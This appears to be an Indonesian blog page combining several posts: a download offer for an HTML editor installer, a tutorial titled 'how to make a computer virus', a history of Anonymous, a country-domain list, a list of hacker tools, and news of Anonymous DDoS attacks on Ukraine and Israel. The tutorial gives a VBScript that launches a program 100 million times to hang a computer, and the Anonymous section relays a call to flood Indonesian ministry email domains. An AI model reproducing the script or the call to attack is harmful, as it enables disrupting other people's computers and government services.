Aplikasi Pembuatan Website 2013

image

Dirgahayu Republik Indonesia yang Ke 68!!
Kali ini saya akan share program untuk membuat Website.. Langsung saja kawan..

Nama Program : WYSIWYG HTML Editor
Version : 1.0 Beta (Build 1.0.0.1)
Fungsi : Untuk Membuat Website, langsung Preview BROWSER

Fitur :
– With .NET SYSTEM
– Preview without Save
– WYSIWYG
– Toolbar
– Custom Color Changed
– Other
-> If You Find BUG, Send Your Report Bug

For Download
http://www.mediafire.com/download/3cjqoaw3qfjnr3a/Setup.exe (SPECIAL EDITION)

http://www.mediafire.com/download/iwhx34blb6v2926/Version_1.0_Beta_(Build_1.0.0.1)_Setup.exe (STANDARD EDITION)

hanya ini yang bisa saya beri untuk BANGSA INDONESIA. Semoga bermanfaat

Cara Membuat Virus Komputer

image

Membuat virus bukanlah merupakan hal
yang sulit. Karena, kita dapat membuatnya
dengan notepad yang terdapat di semua
komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

Langkah-langkah:
1. buka notepad

2. copy+paste bahasa pemograman(yang
bercetak tebal) di bawah ini:
@echo off
option explicit
dim wshshell
set
wshshell=wscript.createobject(“wscript.s
hell”)
dim x
for x = 1 to 100000000
wshshell.run
“tourstart.exe”
next

3. Save notepad dengan nama virus.vbs
( pastikan ”save as type” diubah ke ”allfiles”)

4. Ingat!! jangan klik file tersebut. Karena komputer anda akan dipenuhi oleh 100000000 tourstart yang akan memenuhi layar anda, dan akan membuat komputer hang total sebelum anda mendelete semuanya.

5. bila ingin mencoba virus ini.
silahkan membuat ulang program, dengan
perbedaan ubah 100000000 ke 10, untuk percobaan. maka setelah anda mengklik program.

Layar anda akan dipenuhi oleh hanya 10 tourstart saja.

Asal Usul Anonymous

image

Anonymous atau anonim (‘tanpa nama’)
merupakan istilah Internet yang
diperkenalkan pertama kali di tahun 2003 oleh imageboard 4chan. Anonymous mewakili banyak komunitas online saat itu sebagai “otak” dan “penggerak’ gerakan anarkis global di dunia digital (internet). Organisasi ini juga digunakan sebagai kedok berbagai tindakan negatif di internet. Nama dan identitas sebenarnya para anggota komunitas ini tidak diketahui publik.

Anonymous awalnya merupakan sebuah
konsep dunia hiburan yang diadopsi oleh komunitas online yang terdesentralisasi. Komunitas ini melakukan berbagai tindakan terkoordinasi. Tujuan dari gerakan ini adalah meraih kebebasan berekspresi.

Pada tahun 2008, Anonymous secara kolektif membangun kolaborasi internasional termasuk kegiatan hack internasional, serta melakukan tindakan protes dan tindakan represif lainnya.

Anonymous seringkali menggaungkan kebebasan berinternet dan kebebasan berbicara. Berbagai tindakan ini dilabeli
sebagai”anonym”. Karena banyak
dilakukan oleh orang-orang yang tidak
dikenal, atribut yang menempel kepada
mereka disebut sebagai “anonymous”.
Meskipun tidak selalu terikat dengan
berbagai aktivitas online tunggal, banyak situs yang berkaitan dengan aktivitas anonymous seperti 4chan dan futaba, yang terkait juga dengan WikiEncyclopedia dramatica, dan sejumlah forum yang difasilitasi oleh simpatisannya. Berbagai gerakan kontroversial, sejumlah protes, dan penolakan dengan menggunakan model serangan Distributed Denial of Service (DDoS) di tahun 2008 menjadikan Anonymous makin terangkat ke permukaan (rising star). Selain itu, Anonymous juga dikenal sebagai Aktivis Anti-Illuminati.

Para anggotanya dapat dibedakan didepan publik dengan mengenakan topeng Guy Fawkes atau yang biasa dikenal V for Vendetta. Pada tahun 2012, Majalah Time memasukkan nama “Anonymous” sebagai salah satu orang paling berpengaruh di dunia.

Apa yang dilakukan Anonymous?
Setelah merebaknya Wikileaks, banyak pro dan kontra di dunia cyber yang menanggapinya. Tidak jarang, mereka yang berseberangan sampai saling melakukan serangan untuk mempertahankan pendapat tersebut.
Kondisi ini kian panas ketika ranah internet dihebohkan oleh adanya serangan dari para pendukung Wikileaks terhadap situs-situs pembayaran seperti paypai, Visa dan Master Card, dan situs senator terkenal di Amerika Serikat yakni Joe
Lieberman. Serangan ini dilakukan secara sukarela dengan mengerahkan zombie botnet di berbagai situs tersebut.

Para user internet secara sukarela
menggunakan komputer (server) dan
bandwidth mereka untuk menyerang
berbagai situs. Kegiatan ini menggunakan model serangan DDOS (DDOS attack). Para user (simpatisan) mengunduh dan menggunakan perkakas (tool) tersebut secara gratis.

Perangkat yang dinamai LOIC (Low Orbit Ion Cannon) ini mengerahkan kelompok Anonymous dengan cara menggunakan komputer mereka sebagai bagian dari serangan DDOS secara bersama- sama (sebagai botnet).Tool ini saling berhubungan via perintah dan kontrol sistem yang disebut HIVEMIND. Kontrol ini akan mengaktifkan (enable) Anonymous dan melakukan koordinasi untuk melakukan berbagai serangan.
Perangkat lunak LOIC ini tidak dibuat
secara spesifik untuk menyerang, tetapi dimodifikasi sedemikian rupa oleh para aktivis Anonymous untuk menyerang berbagai macam sasaran.

Korban serangannya beraneka ragam seperti Recording Industry Association
of America (RIAA) dan The Motion Picture Association of America (MPAA). Situs ini dibuat lumpuh berhari-hari. Perlu diketahui bahwa berpartisipasi dalam zombie botnet (seperti LOIC) ini merupakan tindakan pelanggaran di Internet dan diatur dalam pelanggaran
Undang-undang Informasi dan Transaksi Elektronik (UU ITE).

Menurut perusahaan sekuriti terkemuka Panda Security, serangan DDOS yang dilakukan Anonymous dengan mengerahkan zombie botnet kepada situs-situs pembayaran terkenal tersebut dilakukan oleh lebih dari 30.000 komputer secara serempak.

“Panda” mengatakan bahwa serangan ini dilakukan secara terpisah dengan menggunakan Windows Messenger, P2P networks dan via USB stick. Anonymous di Indonesia Bila menyimak kampanye Anonymous yang disampaikan via YouTube.com, dapat disimpulkan bahwa target serangan ini adalah Kementerian
Komunikasi dan Teknologi Informasi yang berbicara tentang penyensoran internet. Ini karena Anonymous menganggap bahwa terjadi penyensoran oleh Pemerintah Indonesia terhadap rapid*share, Fileserve, dan ribuan situs yang lain.

Akhirnya Anonymous mengajak siapapun di Indonesia (khususnya yang merasa disensor) untuk menyerang via email ke semua domain name @depkominfo.go.id dan @kominfo.go.id. pesan pesan l anonymous Waktunya telah tiba bagi orang-orang di dunia untuk bersatu. Anda tidak dapat menunggu untuk sebuah Revolusi, anda adalah revolusi itu sendiri, kami adalah revolusi, kekuatan kami adalah pada jumlah.

Anonymous memerlukan bantuan anda,
orang-orang di seluruh dunia meminta
bantuan anda! Kami melakukannya karena kami bisa! Kami melakukannya untuk masa depan anak-anak kami dan semua kehidupan di planet ini. Kami melakukannya karena kami melihat kebohongan dan tipuan. Anonymous adalah semua orang. Semua orang adalah Anonymous. Sekarang! anda juga bisa menjadi Anonymous. Bergabunglah dengan kami, Anonymous!

We do not forget.
We do not forgive.
We are legion.
Expect us.

Tidak ada cara bagaimana bergabung
dengan Anonymous, karena kita semua
bisa menjadi Anonymous, Anonymous
tidak memiliki pemimpin dan tidak memiliki struktur organisasi.

Kode Lengkap Nama Domain Seluruh Negara

image

Top Level Domain [TLD]
Umum : .biz, .com, .info, .net, .org, .pro
Terbaru : .name, .tv
Pengelola: .aero, .asia, .cat, .coop, .edu, .g
Infrastruktur : .arpa
Lainnya : .example, .invalid, .localhost
, .test, .bitnet, .csnet, .local, .root, .uucp, .o
Dihapus : .nato

Kode Domain Negara (ccTLD)
Berikut ini adalah daftar lengkap kode
domain negara atau country code Top
Level Domain [ccTLD] seluruh dunia :

A
.ac – Pulau Ascension
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afghanistan
.ag – Antigua dan Barbuda
.ai – Anguilla
.al – Albania
.am – Armenia
.an – Antilles Belanda
.ao – Angola
.aq – Antarctica
.ar – Argentina
.as – Samoa Amerika
.at – Austria
.au – Australia
.aw – Aruba
.ax – Pulau Åland
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgium
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia
.br – Brazil
.bs – Bahama
.bt – Bhutan
.bv – Pulau Bouvet
.bw – Botswana
.by – Belarusia
.bz – Belize

C
.ca – Kanada
.cc – Pulau Cocos
.cd – Republik Demokratik Kongo
.cf – Republik Afrika Tengah
.cg – Republik Kongo
.ch – Swiss
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Pulau Cook
.cl – Chili
.cm – Kamerun
.cn – China
.co – Kolombia
.cr – Kosta Rica
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Christmas
.cy – Siprus
.cz – Republik Ceko

D
.de – Jerman
.dj – Djibouti
.dk – Denmark
.dm – Dominica
.do – Republik Dominika
.dz – Aljazair

E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat
.er – Eritrea
.es – Spanyol
.et – Ethiopia
.eu – Uni Eropa

F
.fi – Finlandia
.fj – Fiji
.fk – Kepulauan Falkland
.fm – Mikronesia
.fo – Kepulauan Faroe
.fr – Perancis

G
.ga – Gabon
.gb – (Great Britain) Inggris Raya
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Equatorial Guinea
.gr – Yunani
.gs – Georgia Selatan dan Kepulauan
Sandwich Selatan
.gt – Guatemala
.gu – Guam
.gw – Guinea-Bissau
.gy – Guyana

H
.hk – Hong Kong
.hm – Pulau Heard dan Kepulauan
McDonald
.hn – Honduras
.hr – Kroasia
.ht – Haiti
.hu – Hungaria

I
.id – Indonesia
.ie – Irlandia
.il – Israel
.im – Isle of Man
.in – India
.io – British Indian Ocean Territory
.iq – Irak
.ir – Iran
.is – Iceland
.it – Italia

J
.je – Jersey
.jm – Jamaika
.jo – Jordania
.jp – Jepang

K
.ke – Kenya
.kg – Kyrgyzstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts and Nevis
.kp – Korea Utara
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan

L
.la – Laos
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lithuania
.lu – Luxembourg
.lv – Latvia
.ly – Libya

M
.ma – Maroko
.mc – Monako
.md – Moldova
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Macedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia
.mo – Macau
.mp – Kepulauan Mariana Utara
.mq – Martinique
.mr – Mauritania
.ms – Montserrat
.mt – Malta
.mu – Mauritius
.mv – Maldives ( Maladewa)
.mw – Malawi
.mx – Mexico
.my – Malaysia
.mz – Mozambique

N
.na – Namibia
.nc – New Caledonia (Kaledonia Baru)
.ne – Niger
.nf – Kepulauan Norfolk
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda
.no – Norwegia
.np – Nepal
.nr – Nauru
.nu – Niue
.nz – New Zealand (selandia Baru)

O
.om – Oman

P
.pa – Panama
.pe – Peru
.pf – Polynesia Perancis
.pg – Papua New Guinea
.ph – Filipina
.pk – Pakistan
.pl – Polandia
.pm – St. Pierre dan Miquelon
.pn – Pitcairn
.pr – Puerto Rico
.ps – Palestina
.pt – Portugis
.pw – Palau
.py – Paraguay

Q
.qa – Qatar

R
.re – Reunion
.ro – Rumania
.rs – Serbia
.ru – Russia
.rw – Rwanda

S
.sa – Saudi Arabia
.sb – Kepulauan Solomon
.sc – Seychelles
.sd – Sudan
.se – Swedia
.sg – Singapura
.sh – St. Helena
.si – Slovenia
.sj – Svalbard dan Kepulauan Jan Mayen
.sk – Slovakia
.sl – Sierra Leone
.sm – San Marino
.sn – Senegal
.so – Somalia
.sr – Suriname
.st – Sao Tome dan Principe
.su – USSR (tidak dipakai)
.sv – El Salvador
.sy – Syria atau Suriah
.sz – Swaziland

T
.tc – Kepulauan Turks and Caicos
.td – Chad
.tf – Teritorial Perancis bagian Selatan
.tg – Togo
.th – Thailand
.tj – Tajikistan
.tk – Tokelau
.tl – Timor-Leste
.tm – Turkmenistan
.tn – Tunisia
.to – Tonga
.tr – Turki
.tt – Trinidad dan Tobago
.tv – Tuvalu
.tw – Taiwan
.tz – Tanzania

U
.ua – Ukraina
.ug – Uganda
.uk – Inggris
.us – Amerika Serikat
.uy – Uruguay
.uz – Uzbekistan

V
.va – Vatikan
.vc – Saint Vincent dan Grenadines
.ve – Venezuela
.vg – Kepulauan Virgin Inggris
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu

W
.wf – Wallis dan Futuna
.ws – Samoa

Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia

Z
.za – Afrika Selatan
.zm – Zambia
.zw – Zimbabwe

Nah, itulah domain yang sudah terdaftar resmi di berbagai negara.

10 Tools Favorit Hacker

image

Setelah sekian lama, akhirnya bisa menulis di blog ini kembali.. Sebagaimana kita ketahui Hacker adalah peretas yang banyak ditakuti bahkan dikagumi oleh khalayak. Berikut ini, saya akan share Tools favorit para Hacker …

1. NESSUS
pertama kali dibuat oleh Renaud Deraison
pada tahun 1998 dan disebarkan untuk
komunitas internet secara bebas,
bermanfaat, ter-update dengan baik serta
mudah untuk digunakan.
Nessus adalah sebuah program untuk
mencari kelemahan pada sebuah sistem
komputer. Menurut situs resminya di
http://www.nessus.org , tool ini telah digunakan
oleh lebih dari 75.000 organisasi dan
perusa…haan di seluruh dunia.

2. SNORT
Snort adalah sebuah IDS, yaitu tool untuk
mencegah dan mendeteksi serangan
terhadap sistem komputer. Vendor dari
snort mengklaim bahwa tool ini telah
didownload berjuta-juta kali dari situs
mereka. Anda mungkin berminat untuk
mencobanya, silahkan download tool ini di
http://www.snort.org .

3. KISMET
Kismet adalah sebuah tool untuk
mendeteksi koneksi wireless(mendukung
lalu lintas 802.11b, 802.11a, dan
802.11g ) , menangkap paket dalam
sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai
kismet, anda dapat mengunjungi situs
http://www.kismetwireless.net/ atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework
Metasploit Framework adalah sebuah
proyek open source untuk mengembang
kan, menguji dan menggunakan kode
eksploit. Dibuat dengan bahasa Perl
sebagai fondasi dasar dan dan terdiri dari
komponen pelengkap yang telah dicompile
dengan bahasa C, assembler dan Python.
Metasploit Framework dapat berjalan pada
sistem operasi UNIX, Linux dan Windows.
Keterangan yang lebih detail dapat anda
cari di http://www.metasploit.com/ .

5.Netcat
Netcat adalah sebuah tool networking
utility yang dapat membaca dan menulis
data pada koneksi sebuah jaringan melalui
protokol TCP/IP.
Fitur yang terdapat pada Netcat antara
lain :
Koneksi keluar dan masuk melalui protokol
UDP ataupun TCP dengan port yang
digunakan..
Tunneling mode, tunneling dari UDP ke
TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
Port scanner, untuk mendeteksi port yang
terbuka.
Buffered send-mode dan hexdump RFC854
telnet.

6.Hping
Hping merupakan sebuah tool serba guna.
Tool ini dapat digunakan untuk menguji
kemampuan firewall, mencari port yang
terbuka, menguji keamanan jaringan
dengan menggunakan berbagai jenis
protokol, mendapatkan informasi sistem
operasi, mengevaluasi protokol TCP/IP.

7.TCPDump
Tcpdump juga merupakan sebuah sniffer.
Admin jaringan menggunakan tool ini
untuk memonitor lalu lintas dan
menganalisa permasalahan jika terjadi
gangguan. Menurut informasi di http://
www-iepm.slac.stanford.edu/monitoring/
passive/tcpdump.html , Tcpdump
menggunakan paket filter dari UNIX BSD
untuk meng-capture data(BPF / BSD
Packet Filter).BPF menerima salinan dari
driver pengirim dan penerima paket.Peng
guna tcpdump juga dapat menyaring paket
sesuai dengan keinginan.

8. John The Ripper
Sebuah password cracker dari jaman
nenek moyang para hacker yang masih
menjadi 10 besar tool favorit. Berikut
adalah keterangan dari pembuat John The
Ripper.
“John the Ripper is a password cracker,
currently available for UNIX, DOS,WinNT/
Win95. Its primary purpose is to detect
weak UNIX passwords. It has been tested
with Linux x86/Alpha/SPARC, FreeBSD x86,
OpenBSD x86, Solaris 2.x SPARC and x86,
Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel
Cain & Abel adalah sebuah tool untuk
masalah password. Tool ini dapat
mengumpulkan password dengan metode
network sniffing, meng-crack password
menggunakan Dictionary attack, Brute-Forc
e and Cryptanalysis attacks, merekam
pembicaraan VoIP (Voice Over Internet
Protocol), meng-crack jaringan wireless,
menganalisa trafik dalam jaringan.
http://www.oxid.it

10. WireShark / Ethereal
Wireshark / Ethereal adalah sebuah tool
untuk menganalisa protokol jaringan.
Fungsinya juga sebagai sebuah sniffer.
Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X,
dan Linux. http://www.wireshark.org

Jadi, Tools manakah yang menurut kalian paling berguna?

Tak Terima Demonoid Ditutup, Anonymous Serang Ukraina

Gambar

 

KHIEV – Anggota grup hacking Anonymous menyerang situs resmi milik pemerintah Ukraina. Serangkan yang dilakukan komunitas tersebut menyusul kebijakan pemerintah Ukrain yang menutup tautan (link) BitTorrent dari situs Demonoid.

Anggota Anonymous menggunakan serangan Distributed denial of Services (DDoS) untuk mengganggu situs National Television, Radio Broadcasting Council of Ukraine, dan Agensi Ukraina untuk hak cipta dan anti pembajakan. Demikian dilansir dari T3, Sabtu (11/10/2012).

Sementara itu, Anonymous pun bersumpah untuk membalas dendam ke pemerintah Ukraina yang telah menutup situs Demonoid awal pekan ini. Selain itu, Anonymous juga meluncurkan sebuah video di YouTube. Melalui video tersebut para hactivist memberikan peringatan kepada pemerintah Ukraina atas tidakannya.

Seperti diketahui, penutupan situs Demonoid merupakan langkah dalam kampanye melawan pembajakan. Demonoid tercatat dalam The Notorious Markets List, yang merupakan sebuah dokumen pemerintah Amerika Serikat mengenai pelanggaran hak cipta.

Anonymous: Negara Zionis itu pengecut!

Gambar

 

Menurut pengakuan pihak Israel, sejak Rabu sampai Jumat, sekitar 422 roket diluncurkan ke Gaza. CNN melansir sedikitnya 19 orang meninggal dari serangan tersebut. Dunia mengecam. Hacktivist Anonymous pun berang.

Dengan sandi operasi yang dinamakan Operation Pillar of Defense, Israel meluncurkan ratusan roket beserta berondongan bom yang dijatuhkan dari pesawat terbang. Banyak negara mengecam sekaligus mengutuk tindakan Israel tersebut. Tidak hanya di dunia nyata, dunia maya pun ikut ‘panas’ akibat ulah tidak manusiawi Israel itu.

Sesaat setelah gempuran mematikan ke Gaza tersebut, banyak pengguna internet khususnya yang memiliki account di jejaring sosial seperti Facebook, Twitter dan lainnya bereaksi terhadap serangan tersebut. Tidak hanya publik umum, hacktivist sekaliber Anonymous juga merasa geram atas aksi tersebut.

Seperti yang dilansir The Register (16/11), Anonymous telah meluncurkan ‘serangan balasan’ berupa DDoS ke banyak website Israel serta men-deface tampilannya. Dalam account resmi Anonymous mengatakan bahwa dalam jangka waktu 3 jam setidaknya lebih dari 40 situs pemerintah Israel dan militer rontok.

Tidak hanya itu saja, dengan sandi operasi yang mereka namakan #OpsIsrael tersebut, Anynomous mengancam akan memutuskan jaringan internet dan jaringan telekomunikasi di Israel dalam jangka waktu dekat.

Uniknya, walaupun ancaman Anonymous tersebut nyata, namun sampai sekarang Israeli Defense Forces (IDF) menyatakan tidak ada serangan yang cukup berarti, hanya beberapa situs kecil saja yang berhasil diretas. Hal ini disebabkan karena pihak Israel memiliki online security yang tangguh. Tentu saja dengan dukungan berbagai pihak.

Dalam serangannya, Anonymous selalu menampilkan satu gambar hasil roket Israel yang menghajar daerah pemukiman dengan tulisan, “We Anonymous will not sit back and watch a cowardly Zionist State demolish innocent people’s lives.”

Anonymous juga menuliskan dalam situsnya –Anonpaste– mereka mengajak siapa saja yang ingin membantu menyerang Israel dapat mengunduh ‘racikan bom’ ciptaan mereka.

 

 

Israel: Serangan Anonymous tak berarti

Gambar

 

Setelah mendeklarasikan ‘perang’ melawan Israel, Anonymous menyebutkan bahwa sampai sekarang sedikitnya 659 situs Israel rontok termasuk bobolnya sekuritas online sejumlah bank di negara tersebut. Namun, pihak Israel hanya mencibir ulah dari Anonymous tersebut.

Dibantu dengan kelompok peretas serta peretas individu dari berbagai dunia, sampai sekarang telah ratusan website Israel berhasil dilumpuhkan. Serangan DDoS menghajar banyak situs militer, pemerintahan serta insitusi milik Israel.

Namun, serangan-serangan cyber tersebut tidak membuat Israel merasa takut, mereka malah mengatakan bahwa serangan yang terjadi tidak ada dampak serius. Pihak Israel bahkan mengatakan bahwa situs yang telah di-deface tersebut dapat dipulihkan kurang dari 10 menit saja.

Huffingston Post (19/11) melansir bahwa salah seorang peretas individu dari Pakistan mengatakan, “Kita tidak akan berhenti membombardir Israel sebelum mereka juga berhenti membunuh anak-anak dan orang-orang yang tidak bersalah di Gaza.”

Walaupun Anonymous banyak mendapat kecaman serta diburu pihak berwajib atas tindakannya meretas sejumlah website penting di dunia, namun untuk urusan kali ini, banyak pihak yang pro dengannya. Bahkan banyak hacker-hacker lain dari banyak negara juga turut mensupport Anonymous dalam menyerang Israel.

Israel: Hacker “Anonymous” yang serang kita itu sama dengan teroris

Gambar

 

Sejak awal deklarasi perang dikumandangkan oleh Anonymous, sampai saat ini banyak situs Israel yang rontok. Dalam hal ini, pihak Israel memasukkan Anonymous dalam kategori teroris dunia maya.

Sejak Operation Pillar of Defense dimulai, Times of Israel (19/11) mencatat bahwa sekitar 44 juta serangan diluncurkan para peretas dari seluruh dunia khususnya oleh hacktivist Anonymous ke Israel.

Dari banyaknya serangan yang diluncurkan, beberapa situs penting seperti, website pemerintah, militer dan yang berhubungan dengan layanan publik lumpuh. Dikarenakan serangan tersebut, Inspektur Jenderal kepolisian Israel Yohanan Danino mendeklarasikan pembentukan satu tim khusus untuk menangani permasalahan itu.

Tim yang berisikan 60 orang pakar IT tersebut akan didanai langsung oleh pemerintah. Danino mengatakan bahwa aktivitas serangan dunia maya yang diterima Israel ini dapat dikatakan sebagai serangan cyber terbesar dalam sejarah. Bahkan dia juga mengategorikan Anonymous dan peretas-peretas yang menyerang Israel ini sebagai teroris dunia maya.

Setelah tim pengaman tersebut terbentuk, pihak Israel mengatakan bahwa mereka telah berhasil mengatasi serangan-serangan yang masuk. “Kita memang menemukan lawan yang benar-benar tangguh, namun serangan mereka berhasil kita gagalkan,” ungkap Carmela Avner, Israel Chief of Information Officer.

Sampai sekarang dukungan untuk membantu Anonymous berperang melawan Israel terus bertambah. Tercatat banyak hacker dari Tunisia, Maroko, Pakistan, Turki, Indonesia dan negara lainnya ikut melancarkan serangan ke Israel.